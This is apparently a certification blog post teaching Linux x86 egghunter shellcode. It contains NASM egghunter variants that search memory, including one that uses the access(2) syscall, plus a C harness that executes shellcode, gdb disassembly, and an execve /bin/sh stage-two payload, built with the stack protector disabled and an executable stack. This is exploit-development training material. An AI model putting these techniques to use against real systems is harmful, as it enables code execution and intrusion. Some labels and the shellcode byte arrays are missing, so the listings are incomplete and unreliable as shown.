linux x86 egghunter shellcode

Egghunter is a stage one piece of code that searches memory for predefined tag that represents start of second stage of shellcode and passes execution to it.
To create a simple one we create a c program that pass execution to stage one egghunter that searches for egg in memory and then pass execution to found code executing stage two.

#include <stdio.h>
#include <string.h>

#define EGG "\x90\x50\x90\x50"

unsigned char egghunt[] = \
// egghunter shellcode here

unsigned char shellcode[] = \

int main ()

        printf("Egghunter length: %d\n", strlen(egghunt));
        printf("Shellcode length: %d\n", strlen(shellcode));
        int(*ret)() = (int(*)())egghunt;

As egg we select assembly opcodes to pass execution directly to egg and not calculate shellcode address. As shellcode we use execve /bin/sh shellcode.
The simplest example of egghunter will be

global _start

section .text


        mov edx, 0x50905090      ;move egg to edx
        inc eax                  ; inc memory address				
        cmp dword [eax], edx     ; compare memory contents to egg
        jne rotate               ; loop if not equal

        jmp eax	                 ; pass execution to stage two

This stage one code is only 12 bytes but will it work in every situation? The trick here is when C wrapper passes execution to stage one eax contains stage one first instruction memory address. This memory can be dereferenced and all following too. In this case shellcode runs smoothly and finds the egg and pass execution.

   0x0804845a <+63>:	add    esp,0x10
   0x0804845d <+66>:	sub    esp,0x8
   0x08048460 <+69>:	push   eax
   0x08048461 <+70>:	push   0x8048526
   0x08048466 <+75>:	call   0x80482e0 <printf@plt>
   0x0804846b <+80>:	add    esp,0x10
   0x0804846e <+83>:	mov    DWORD PTR [ebp-0xc],0x8049780
   0x08048475 <+90>:	mov    eax,DWORD PTR [ebp-0xc]
=> 0x08048478 <+93>:	call   eax
   0x0804847a <+95>:	mov    eax,0x0
   0x0804847f <+100>:	mov    ecx,DWORD PTR [ebp-0x4]
   0x08048482 <+103>:	leave  
   0x08048483 <+104>:	lea    esp,[ecx-0x4]
   0x08048486 <+107>:	ret    
End of assembler dump.
(gdb) display/x $eax
1: /x $eax = 0x8049780
(gdb) stepi
0x08049780 in egghunt ()
(gdb) disassemble
Dump of assembler code for function egghunt:
=> 0x08049780 <+0>:	mov    edx,0x50905090
   0x08049785 <+5>:	inc    eax
   0x08049786 <+6>:	cmp    DWORD PTR [eax],edx
   0x08049788 <+8>:	jne    0x8049785 <egghunt+5>
   0x0804978a <+10>:	jmp    eax
   0x0804978c <+12>:	add    BYTE PTR [eax],al
End of assembler dump.
(gdb) display/x $eax
1: /x $eax = 0x8049780

(gdb) disassemble $eax, +50
Dump of assembler code from 0x8049780 to 0x80497b2:
=> 0x08049780 <egghunt+0>:	mov    edx,0x50905090
   0x08049785 <egghunt+5>:	inc    eax
   0x08049786 <egghunt+6>:	cmp    DWORD PTR [eax],edx
   0x08049788 <egghunt+8>:	jne    0x8049785 <egghunt+5>
   0x0804978a <egghunt+10>:	jmp    eax
   0x0804978c <egghunt+12>:	add    BYTE PTR [eax],al
   0x0804978e:	add    BYTE PTR [eax],al
   0x08049790:	add    BYTE PTR [eax],al
   0x08049792:	add    BYTE PTR [eax],al
   0x08049794:	add    BYTE PTR [eax],al
   0x08049796:	add    BYTE PTR [eax],al
   0x08049798:	add    BYTE PTR [eax],al
   0x0804979a:	add    BYTE PTR [eax],al
   0x0804979c:	add    BYTE PTR [eax],al
   0x0804979e:	add    BYTE PTR [eax],al
   0x080497a0 <shellcode+0>:	nop
   0x080497a1 <shellcode+1>:	push   eax
   0x080497a2 <shellcode+2>:	nop
   0x080497a3 <shellcode+3>:	push   eax
   0x080497a4 <shellcode+4>:	nop
   0x080497a5 <shellcode+5>:	push   eax
   0x080497a6 <shellcode+6>:	nop
   0x080497a7 <shellcode+7>:	push   eax
   0x080497a8 <shellcode+8>:	xor    eax,eax
   0x080497aa <shellcode+10>:	push   eax
   0x080497ab <shellcode+11>:	mov    edx,esp
   0x080497ad <shellcode+13>:	push   0x68732f2f

But what if eax will contain invalid memory. If we initialize eax with xor eax, eax after the loop in shellcode, we receive segmentation fault error.
To solve this issue, we can use linux syscall to make system validate memory for us and receive EFAULT error in case of invalid memory. This technique is described in “Safely Searching Process Virtual Address Space” article.
To validate memory author uses access(2) syscall.

int access(const char *pathname, int mode);

It’s designed to check user permissions on file, and is chosen because it needs a pointer for just one argument and don’t attempt to write for supplied pointer. In case of invalid memory, we receive EFAULT or 0xfffffff2 in eax. As this is a system call we need to move 0x21 (dec 33) to eax as defined in unistd32.h for NR_access

#define __NR_access 33

We need to store first parameter in ebx. In our case it will be an address to validate. Let’s create first access(2) shellcode version.

global _start

section .text


        mov ebx, 0x50905090
        xor ecx, ecx
        mul ecx
        inc edx
        lea ebx, [edx]
        mov al, 0x21
        int 0x80
        cmp al, 0xf2
        jz repeat
        cmp [edx], ebx
        jnz repeat
        cmp [edx+0x4], ebx
        jnz repeat
        jmp edx

This shellcode is 33 bytes versus 12 bytes compared to the first one, and it scans whole memory with no errors. The only problem it’s very slow, scanning every address incrementing by one took 2 minutes 47 seconds. Also as we start at very beginning of process address space we need to mark our stage two shellcode with 2 repeating eggs and check that first one is followed by second, because otherwise we can find our first occurrence of 0x50905090 and pass execution there.
To reduce execution time as author describes, due to the fact that the smallest granular unit of memory on IA32 is PAGE_SIZE, we can assume that if one address in page is invalid all others are invalid too. And if we receive invalid address we adjust address to next page. We get PAGE_SIZE

/bin/sh$ getconf PAGESIZE

It is 0x1000 in hex. We can use or 0xfff to find the last page address, and then it will be incremented by one and point to first address of next page. Also we made some optimizations changing pusha; popa; mov al, 0x21; to push byte 0x21 and pop eax. This shellcode size is 37 but it takes half a second to find necessary address.

global _start

section .text


        xor ecx, ecx
        mul ecx
        or dx, 0xfff
        inc edx
        lea ebx, [edx]
        push byte 0x21
        pop eax
        int 0x80
        cmp al, 0xf2
        jz npage
        mov ebx, 0x50905090
        cmp [edx], ebx
        jnz repeat
        cmp [edx+0x4], ebx
        jnz repeat
        jmp edx
$ nasm -f elf32 -o egghunt.o egghunt.nasm
$ ld -N $1.o -o $1

Using script:

# This script gets shellcode from binary using objdump 


if [ $# -eq 1 ]; then
      objdump -d ./$1|grep ‘[0-9a-f]:’|grep -v ‘file’|cut -f2 -d:|cut -f1-7 -d’ ‘|tr -s ‘ ‘|tr ‘\t’ ‘ ‘|sed ‘s/ $//g’|sed ‘s/ /\\x/g’|paste -d ‘‘ -s |sed ‘s/^/"/’|sed ‘s/$/"/g’|sed ‘s/$/;/’
      echo "please input program name"

we get shellcode:

#include <stdio.h>
#include <string.h>

#define EGG "\x90\x50\x90\x50"

unsigned char egghunt[] = \

unsigned char shellcode[] = \

int main ()
        printf("Egghunter length: %d\n", strlen(egghunt));
        printf("Shellcode length: %d\n", strlen(shellcode));
        int(*ret)() = (int(*)())egghunt;
$ gcc -fno-stack-protector -z execstack rev.c -o revc

and execute.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification.

Student ID: SLAE-1063

